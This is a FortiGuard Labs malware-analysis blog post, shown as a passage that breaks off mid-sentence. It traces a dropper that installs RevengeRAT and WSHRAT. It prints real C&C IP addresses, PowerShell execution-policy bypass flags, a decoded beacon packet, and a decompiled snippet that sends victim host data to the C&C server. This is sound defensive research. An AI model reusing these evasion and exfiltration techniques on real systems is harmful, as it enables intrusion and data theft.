{"id":16883,"date":"2019-11-13T15:40:02","date_gmt":"2019-11-13T23:40:02","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2019\/11\/13\/news-10621\/"},"modified":"2019-11-13T15:40:02","modified_gmt":"2019-11-13T23:40:02","slug":"news-10621","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2019\/11\/13\/news-10621\/","title":{"rendered":"Double Trouble:  RevengeRAT and WSHRAT"},"content":{"rendered":"<div class=\"aem-Grid aem-Grid--12 aem-Grid--default--12\">\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p><b><i>A FortiGuard Labs Threat Analysis Report<\/i><\/b><\/p>\n<p>As part of our continuous malware monitoring, the FortiGuard Labs team recently captured a <a href=\"https:\/\/www.virustotal.com\/gui\/file\/35c0980e99987f4418c8d186b9d5514c340c05ec0470c485182d24868f2a37db\/detection\">sample<\/a> file that our <i>EagleSight Malware Analysis System<\/i> flagged as suspicious. We also noticed that this malware had a low detection rate, as shown below. As a result, we decided to perform a manual analysis on it, and we discovered that the file was designed to drop malware. 
We then detected it dropping both RevengeRAT and WSHRAT.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn--default--9 aem-GridColumn aem-GridColumn--offset--default--1\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/malware-analysis-revenge-rat-sample\/_jcr_content\/root\/responsivegrid\/image_1337821993.img.png\/1573604360030\/revengerat-one.png\" alt=\"revengerat sample\"\/>         <\/noscript>                   <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<h2>First Stage \u2013 Launcher\/Dropper<\/h2>\n<p>When we opened the sample file, which contained JavaScript code, in a text editor, we could see that it contained URL-encoded data. Once decoded, it revealed VBScript code. The author of this malware used simple character replacement when calling the \u201cChr()\u201d function in an attempt to hide the actual strings (\u201c<b>shell.application<\/b>\u201d and \u201c<b>cmd \/c cd %temp%<\/b>\u201d, respectively).<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn aem-GridColumn--default--12\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/malware-analysis-revenge-rat-sample\/_jcr_content\/root\/responsivegrid\/image_1779882811.img.png\/1573604391748\/revengerat-two.png\" alt=\"Figure 1 \u2013 VBScript Code\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 1 \u2013 VBScript Code<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>The objectives of the VBScript code are as follows:<\/p>\n<ol>\n<li>Create a new Shell.Application object<\/li>\n<li>Call the ShellExecute() function, which eventually 
generates a new file with the hardcoded filename of \u201cA6p.vbs\u201d<\/li>\n<li>Execute the newly-created script file \u201cA6p.vbs\u201d<\/li>\n<li>Pause the CMD command execution for 13 seconds (by calling the timeout.exe program)<\/li>\n<li>Delete the script file \u201cA6p.vbs\u201d<\/li>\n<li>Execute the downloaded script file \u201cMicrosoft.vbs\u201d<\/li>\n<li>Close the current\/active window<\/li>\n<\/ol><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn--default--9 aem-GridColumn aem-GridColumn--offset--default--1\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/malware-analysis-revenge-rat-sample\/_jcr_content\/root\/responsivegrid\/image_1095175056.img.png\/1573604417171\/revengerat-three.png\" alt=\"Figure 2 \u2013 1st Stage Launcher\/Dropper Execution\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 2 \u2013 1st Stage Launcher\/Dropper Execution<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<h2>Second Stage \u2013 Downloader<\/h2>\n<p>The purpose of the \u201cA6p.vbs\u201d file is to fetch a resource (an additional VBScript) from an external website. The code uses obfuscated strings, presumably to avoid detection. The malware writer then uses a function (H9a) to reveal those strings. 
This is used for both creating objects (<b>MSXML2.XMLHTTP<\/b> and <b>ADODB.STREAM<\/b>) and getting regular strings, such as <b>MICROSOFT.VBS<\/b>.<\/p>\n<h2>Script Analysis (MICROSOFT.VBS)<\/h2>\n<p>Once the script \u201cA6p.vbs\u201d is executed, it downloads the script file \u201cMicrosoft.vbs\u201d from its remote server.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn--default--9 aem-GridColumn aem-GridColumn--offset--default--1\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/malware-analysis-revenge-rat-sample\/_jcr_content\/root\/responsivegrid\/image_1580760685.img.png\/1573604436596\/revengerat-four.png\" alt=\"Figure 3 \u2013Downloader Script (A6p.vbs)\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 3 \u2013Downloader Script (A6p.vbs)<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>The file is saved as \u201cMICROSOFT.VBS\u201d in the %TEMP% folder. The VBScript code is composed with a main class called \u201cth3m41n\u201d, using three methods (\u201cdugh41r\u201d, \u201ct01l3t\u201d, and \u201cb3st1n\u201d). 
The purpose of the entire code of \u201cMICROSOFT.VBS\u201d is to reconstruct an XML-based structure by invoking the creation of a <b>Microsoft.XMLDOM<\/b> object, passing it through decoding layers between the different class methods, and finally executing the base64-encoded data by making a final call to the VBScript\u2019s \u201c<b>ExecuteGlobal<\/b>()\u201d function.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn aem-GridColumn--default--12\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/malware-analysis-revenge-rat-sample\/_jcr_content\/root\/responsivegrid\/image_958039499.img.png\/1573604456525\/revengerat-five.png\" alt=\"Figure 4 \u2013 MICROSOFT.VBS and its decoded Base64 data\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 4 \u2013 MICROSOFT.VBS and its decoded Base64 data<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<h2>Script Analysis (MICROSOFT.VBS \u2013 Decoded Base64 Data)<\/h2>\n<p>The script makes use of two functions: <b>writeBytes()<\/b> \u2013 which creates an <b>ADODB.Stream<\/b> object to write binary data into a given file for an arbitrary number of bytes, and <b>decodebase64()<\/b> \u2013 which creates a\u00a0<b>Microsoft.XMLDOM<\/b> object to create a temporary XML element to store base64-encoded data and then eventually decode it.\u00a0<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn--default--9 aem-GridColumn aem-GridColumn--offset--default--1\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" 
src=\"\/blog\/threat-research\/malware-analysis-revenge-rat-sample\/_jcr_content\/root\/responsivegrid\/image_1010441325.img.png\/1573604500423\/rat-six-seven.png\" alt=\"Figure 5 \u2013 writeBytes() and decodebase64() functions\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 5 \u2013 writeBytes() and decodebase64() functions<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>The most notable data holders are two local variables. One, named \u201c<b>longText1<\/b>\u201d, contains base64-encoded VBScript data, which is a partial copy of \u201cMICROSOFT.VBS\u201d since the base64 data (line 32) differs from the downloaded file. Another variable is named \u201c<b>H<\/b>\u201d, which holds the data of a .NET assembly executable. It is also apparent that malware writers added garbage code in an attempt to delay analysis.<\/p>\n<p>Once the aforementioned code is executed, it creates a new <i>WScript.Shell<\/i> object and collects OS environment and hardcoded data, which will eventually end in running the newly created script (GXxdZDvzyH.vbs) by calling the VBScript interpreter with the \u201c<b>\/\/B<\/b>\u201d parameter. 
This enables \u201cbatch-mode\u201d and disables any potential warnings or alerts that can occur during execution.\u00a0<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn--default--9 aem-GridColumn aem-GridColumn--offset--default--1\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/malware-analysis-revenge-rat-sample\/_jcr_content\/root\/responsivegrid\/image_717352251.img.png\/1573604520688\/revengerat-eight.png\" alt=\"Figure 6 \u2013 GXxdZDvzyH.vbs generation and execution\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 6 \u2013 GXxdZDvzyH.vbs generation and execution<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>We will discuss the characteristics and actions performed by this sample further in this blog post.<\/p>\n<p>During the script\u2019s execution, a new key is added into the Windows Registry (HKCUMicrosoft SoftwareMicrosoft) called \u201cmicrosoft\u201d, which stores arbitrarily malformed base64-encoded data. 
This data is repaired later by a PowerShell command; the script\u2019s final action replaces \u201c@\u201d with \u201c0\u201d.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn--default--9 aem-GridColumn aem-GridColumn--offset--default--1\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/malware-analysis-revenge-rat-sample\/_jcr_content\/root\/responsivegrid\/image_943474662.img.png\/1573604569952\/revengerat-nine.png\" alt=\"Figure 7 \u2013 Malformed base64 data\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 7 \u2013 Malformed base64 data<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<h2>Executing Revenge RAT and Persistence<\/h2>\n<p>The script invokes a number of composed PowerShell commands to bypass the interpreter\u2019s execution policy and to hide its presence, by passing the \u201c<b>-ExecutionPolicy Bypass -windowstyle hidden -noexit -Command<\/b>\u201d parameters.<\/p>\n<p>The following table shows the command-line arguments passed to the PowerShell interpreter while the script is executing, along with the purpose of each argument.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--11 aem-GridColumn--offset--default--0\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/malware-analysis-revenge-rat-sample\/_jcr_content\/root\/responsivegrid\/image_1531907796.img.png\/1573604606720\/revengerat-ten.png\" alt=\"revenge-rat-table\"\/>         <\/noscript>                   <\/div>\n<div class=\"cmp cmp-text aem-GridColumn 
\n<h2>Connecting">
aem-GridColumn--default--12\">\n<h2>Connecting to the C&amp;C Server<\/h2>\n<p>As mentioned earlier, a new thread is created and a .NET assembly is loaded and executed. We dumped it from the Windows Registry into an executable (<b>e3edfe91e99ba731e58fc2ad33f2fd11<\/b>) to get a better overview of the payload.<\/p>\n<p>The screenshot below shows the basic information of this .exe file.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn--default--9 aem-GridColumn aem-GridColumn--offset--default--1\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/malware-analysis-revenge-rat-sample\/_jcr_content\/root\/responsivegrid\/image_1556786446.img.png\/1573604634502\/revengerat-eleven.png\" alt=\"Figure 8 - Dropped exe file\u2019s basic information\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 8 &#8211; Dropped exe file\u2019s basic information<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>When this sample is loaded into the .NET debugger dnSpy, its code turns out not to be obfuscated, unlike much other malicious software. Instead, its code is very clear and simple.<\/p>\n<p>Once the RAT runs, it connects to two C&amp;C servers, whose IP addresses and ports are assigned in the main class\u2019s constructor. The IP addresses are \u201c193.56.28.134\u201d and \u201c185.84.181.102\u201d. The port number is \u201c5478\u201d for both. 
Below is a screenshot of that constructor, where several variables are initialized, including the C&amp;C IP address and port:<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn--default--9 aem-GridColumn aem-GridColumn--offset--default--1\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/malware-analysis-revenge-rat-sample\/_jcr_content\/root\/responsivegrid\/image.img.png\/1573604667358\/revengerat-twelve.png\" alt=\"Figure 9 - C&amp;C server\u2019s IP address and port number\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 9 &#8211; C&amp;C server\u2019s IP address and port number<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>Unfortunately, by the time we started analyzing this malware, the two C&amp;C servers had already been shut down. However, the malware kept trying to connect to the two IP addresses until a connection was established. So, to continue analyzing this malware, we had to set up a fake C&amp;C server using Netcat on the victim machine. 
To do that, we also changed the C&amp;C server IP address to \u201c127.0.0.1\u201d at the moment it connected.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn--default--9 aem-GridColumn aem-GridColumn--offset--default--1\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/malware-analysis-revenge-rat-sample\/_jcr_content\/root\/responsivegrid\/image_1059192917.img.png\/1573604694566\/revengerat-thirteen.png\" alt=\"Figure 10 \u2013 The C&amp;C server\u2019s changed IP address\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 10 \u2013 The C&amp;C server\u2019s changed IP address<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<h2>Reporting the Collected Information<\/h2>\n<p>Once the connection to the C&amp;C server is established, the RAT collects information from the victim\u2019s system and sends it to the server. From our analysis, each packet between the victim and the server consists of several parts: a command magic string, the data fields corresponding to that command, a separator between fields, and an end magic string. 
\u00a0<\/p>\n<p>\u201cachillepower\u201d is defined as separator to split each data in a packet.<\/p>\n<p>\u201c*-]NK[-*\u201d is defined as packet end magic string.<\/p>\n<p>Now, let\u2019s examine the first packet containing what the malware was able to collect from the victim\u2019s system.<\/p>\n<\/p><\/div>\n<div class=\"raw-import aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--11 aem-GridColumn--offset--default--1\">\n<div class=\"text-container\">\n<p style=\"margin: 0in 0in 0.0001pt; line-height: normal; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"color: black; background: #D9D9D9;\">Information<\/span><\/em><em><span style=\"color: red; background: #D9D9D9;\">achillepower<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">SG91c2U=<\/span><\/em><em><span style=\"color: red; background: #D9D9D9;\">achillepower<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">XzU4MUYxMDkz<\/span><\/em><em><span style=\"color: red; background: #D9D9D9;\">achillepower<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">10.0.2.15<\/span><\/em><em><span style=\"color: red; background: #D9D9D9;\">achillepower<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">TTBZ<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 0.0001pt; line-height: normal; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"color: black; background: #D9D9D9;\">VEVTMEVOVi1QQyAvIE0wWVRlczBFbnY=<\/span><\/em><em><span style=\"color: red; background: #D9D9D9;\">achillepower<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">No<\/span><\/em><em><span style=\"color: red; background: #D9D9D9;\">achillepower<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">TWljcm9zb2Z0IFdpbmRvd3MgNyB<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 0.0001pt; line-height: normal; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"color: black; 
background: #D9D9D9;\">VbHRpbWF0ZSAgMzI=<\/span><\/em><em><span style=\"color: red; background: #D9D9D9;\">achillepower<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">SW50ZWwoUikgQ29yZShUTSkgaTctNjcwMCBDUFUgQCAzLjQwR0h6<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 0.0001pt; line-height: normal; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"color: red; background: #D9D9D9;\">achillepower<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">3757629440<\/span><\/em><em><span style=\"color: red; background: #D9D9D9;\">achillepower<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">TWljcm9zb2Z0IFNlY3VyaXR5IEVzc2VudGlhbHM=<\/span><\/em><em><span style=\"color: red; background: #D9D9D9;\">achillepower<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">Ti9B<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 0.0001pt; line-height: normal; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"color: red; background: #D9D9D9;\">achillepower<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">5478<\/span><\/em><em><span style=\"color: red; background: #D9D9D9;\">achillepower<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">ZG5TcHkgdjYuMC40ICgzMi1iaXQsIC5ORVQgQ29yZSwgRGVidWdnaW5nK<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 0.0001pt; line-height: normal; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"color: black; background: #D9D9D9;\">Q==<\/span><\/em><em><span style=\"color: red; background: #D9D9D9;\">achillepower<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">ZW4tVVM=<\/span><\/em><em><span style=\"color: red; background: #D9D9D9;\">achillepower<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">False<\/span><\/em><em><span style=\"color: red; background: #D9D9D9;\">*-]NK[-*<\/span><\/em><\/p>\n<\/div><\/div>\n<div class=\"cmp cmp-text aem-GridColumn 
aem-GridColumn--default--12\">\n<p>As you can easily see, the first packet is split into 15 blocks by the separator. And most of them are base64 encoded. Next, we\u2019ll explain each part and decode the base64 string if needed.<\/p>\n<ul>\n<li>\u201c<b>Information<\/b>\u201d is the command magic string, which always is the first part of a packet.<\/li>\n<li>\u201c<b>SG91c2U=<\/b>\u201d is decoded as \u201cHouse\u201d.<\/li>\n<li>\u201c<b>XzU4MUYxMDkz<\/b>\u201d is decoded as \u201c_581F1093\u201d, which is the Volume Information.<\/li>\n<li>\u201c<b>10.0.2.15<\/b>\u201d is the IP address of victim\u2019s machine.<\/li>\n<li>\u201c<b>TTBZVEVTMEVOVi1QQyAvIE0wWVRlczBFbnY=<\/b>\u201d is decoded as \u201cM0YTES0ENV-PC \/ M0YTes0Env\u201d, which is the victim\u2019s machine name\u00a0and UserName.<\/li>\n<li>\u201c<b>No<\/b>\u201d identifies whether the victim has a webcam.<\/li>\n<li>\u201c<b>TWljcm9zb2Z0IFdpbmRvd3MgNyBVbHRpbWF0ZSAgMzI=<\/b>\u201d is decoded as \u201cMicrosoft Windows 7 Ultimate 32\u201d, which is the victim\u2019s Windows system information.<\/li>\n<li>\u201c<b>SW50ZWwoUikgQ29yZShUTSkgaTctNjcwMCBDUFUgQCAzLjQwR0h6<\/b>\u201d is decoded as \u201cIntel(R) Core(TM) i7-6700 CPU @ 3.40GHz\u201d, which is the CPU information.<\/li>\n<li>\u201c<b>3757629440<\/b>\u201d is the total capacity of victim\u2019s physical memory.<\/li>\n<li>\u201c<b>TWljcm9zb2Z0IFNlY3VyaXR5IEVzc2VudGlhbHM=<\/b>\u201d is decoded as \u201cMicrosoft Security Essentials\u201d, which should be the installed anti-virus product.<\/li>\n<li>\u201c<b>Ti9B<\/b>\u201d is decoded as \u201cN\/A\u201d, which should be the installed Firewall product.<\/li>\n<li>\u201c<b>5478<\/b>\u201d is the port number of the C&amp;C server it is connecting to.<\/li>\n<li>\u201c<b>ZG5TcHkgdjYuMC40ICgzMi1iaXQsIC5ORVQgQ29yZSwgRGVidWdnaW5nKQ==<\/b>\u201d is decoded as \u201cdnSpy v6.0.4 (32-bit, .NET Core, Debugging)\u201d, which is the title of top-most window. 
Here it is the title of the dnSpy debugger; on a real victim\u2019s system it could be Word, Chrome, etc.<\/li>\n<li>\u201c<b>ZW4tVVM=<\/b>\u201d is decoded as \u201cen-US\u201d, which is the language used on the victim machine.<\/li>\n<li>\u201c<b>False<\/b>\u201d is a hard-coded value.<\/li>\n<\/ul>\n<p>Below is the code snippet used to generate the above packet (Atomic.Key is the separator \u201cachillepower\u201d).<\/p>\n<\/p><\/div>\n<div class=\"raw-import aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--11 aem-GridColumn--offset--default--1\">\n<div class=\"text-container\">\n<pre><code>NewLateBinding.LateCall(this, null, &quot;Send&quot;, new object[]\n{\nOperators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(\nOperators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(\nOperators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(\nOperators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(\nOperators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(\n&quot;Information&quot; + Atomic.Key + this.ID + Atomic.Key, this.Encode(&quot;_&quot; + this.HWD())), Atomic.Key), this.IP()), Atomic.Key), this.
#D9D9D9;\">.<\/span><\/em><em><span style=\"color: #880000; background: #D9D9D9;\">Encode<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">(<\/span><\/em><em><span style=\"color: #1b5d70; background: #D9D9D9;\">Environment<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">.<\/span><\/em><em><span style=\"color: #7a5229; background: #D9D9D9;\">MachineName<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">&nbsp;+&nbsp;<\/span><\/em><em><span style=\"color: #a31515; background: #D9D9D9;\">&#8221;&nbsp;\/&nbsp;&#8220;<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">&nbsp;+&nbsp;<\/span><\/em><em><span style=\"color: #1b5d70; background: #D9D9D9;\">Enviro<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 0.0001pt; line-height: normal; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"color: #1b5d70; background: #D9D9D9;\">nment<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">.<\/span><\/em><em><span style=\"color: #7a5229; background: #D9D9D9;\">UserName<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">)),&nbsp;<\/span><\/em><em><span style=\"color: #2b91af; background: #D9D9D9;\">Atomic<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">.<\/span><\/em><em><span style=\"color: #990099; background: #D9D9D9;\">Key<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">),&nbsp;<\/span><\/em><em><span style=\"color: blue; background: #D9D9D9;\">this<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">.<\/span><\/em><em><span style=\"color: #880000; background: #D9D9D9;\">CIVC<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">()),&nbsp;<\/span><\/em><em><span style=\"color: #2b91af; background: #D9D9D9;\">Atomic<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">.<\/span><\/em><em><span style=\"color: #990099; background: #D9D9D9;\">Key<\/span><\/em><em><span 
style=\"color: black; background: #D9D9D9;\">),&nbsp;<\/span><\/em><em><span style=\"color: blue; background: #D9D9D9;\">this<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">.<\/span><\/em><em><span style=\"color: #880000; background: #D9D9D9;\">Encode<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">(<\/span><\/em><em><span style=\"color: #2b91af; background: #D9D9D9;\">Atomic<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">.<\/span><\/em><em><span style=\"color: #990099; background: #D9D9D9;\">DI<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">.<\/span><\/em><em><span style=\"color: #996633; background: #D9D9D9;\">OSFullName<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">&nbsp;+&nbsp;<\/span><\/em><em><span style=\"color: #a31515; background: #D9D9D9;\">&#8221;&nbsp;&#8220;<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">&nbsp;+&nbsp;<\/span><\/em><em><span style=\"color: #2b91af; background: #D9D9D9;\">Ato<\/span><\/em><\/p>\n<\/div><\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<h2>Command &amp; Control<\/h2>\n<p>In the .Net code we found a thread function called this.data(), which is in charge of handling all received C&amp;C commands. Analyzing this function, we found several command magic strings like \u201cPNC\u201d, \u201cP\u201d, \u201cIE\u201d, \u201cLP\u201d, and \u201cUNV\u201d.<\/p>\n<ul>\n<li>The \u201cPNC\u201d command is just like a heartbeat and the malware only sends back \u201cPNC\u201d.<\/li>\n<li>The \u201cP\u201d command asks the malware to collect the victim\u2019s top-most window title.<\/li>\n<li>The \u201cIE\u201d and \u201cLP\u201d commands ask the malware to manipulate the system registry with given values in the packet.<\/li>\n<li>The \u201cUNV\u201d command packet contains a base64-encoded gzip stream that is compressed from a segment of malicious ASM code. 
Through this command, the attacker can send malicious ASM code to the malware and have it executed in memory. The screenshot below shows the code that processes the \u201cUNV\u201d command: it compares the command string, base64-decodes and gzip-decompresses the payload, and loads the resulting ASM code into memory in the function this.LA(). The ASM code is then executed through an object created by calling the API CreateInstance().<\/li>\n<\/ul><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn--default--9 aem-GridColumn aem-GridColumn--offset--default--1\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/malware-analysis-revenge-rat-sample\/_jcr_content\/root\/responsivegrid\/image_1987765513.img.png\/1573604738789\/revengerat-fourteen.png\" alt=\"Figure 11 - Code snippet of processing \u201cUNV\u201d command\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 11 &#8211; Code snippet of processing \u201cUNV\u201d command<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<h2>Executing WSH RAT and Persistency<\/h2>\n<h3>Script Analysis (GXxdZDvzyH.VBS)<\/h3>\n<p>As part of the second-stage infection chain, this script is executed as well. The malware authors apparently reused the code from MICROSOFT.VBS in the GXxdZDvzyH.vbs script, with a different payload encoded in base64. 
Since this code was already discussed, we will focus on the script hidden inside the encoded data.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn aem-GridColumn--default--12\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/malware-analysis-revenge-rat-sample\/_jcr_content\/root\/responsivegrid\/image_324191320.img.png\/1573672930507\/rat-twelve.png\" alt=\"Figure 12 \u2013 Diff between Microsoft.vbs and GXxdZDvzyH.vbs scripts\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 12 \u2013 Diff between Microsoft.vbs and GXxdZDvzyH.vbs scripts<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<h3>Script Analysis (GXxdZDvzyH.VBS &#8211; DECODED BASE-64)<\/h3>\n<p>The new script is version <b>1.6<\/b> of <b>WSH RAT<\/b>. The code contains a total of 29 functions that perform different tasks, ranging from entrenchment, persistence, and data processing to theft and exfiltration.<\/p>\n<p>Once the script is executed, it performs security checks through function calls that verify the current user\u2019s rights; depending on the result, it either runs as is or elevates itself (<b>startupElevate()<\/b>) to a higher user access level. 
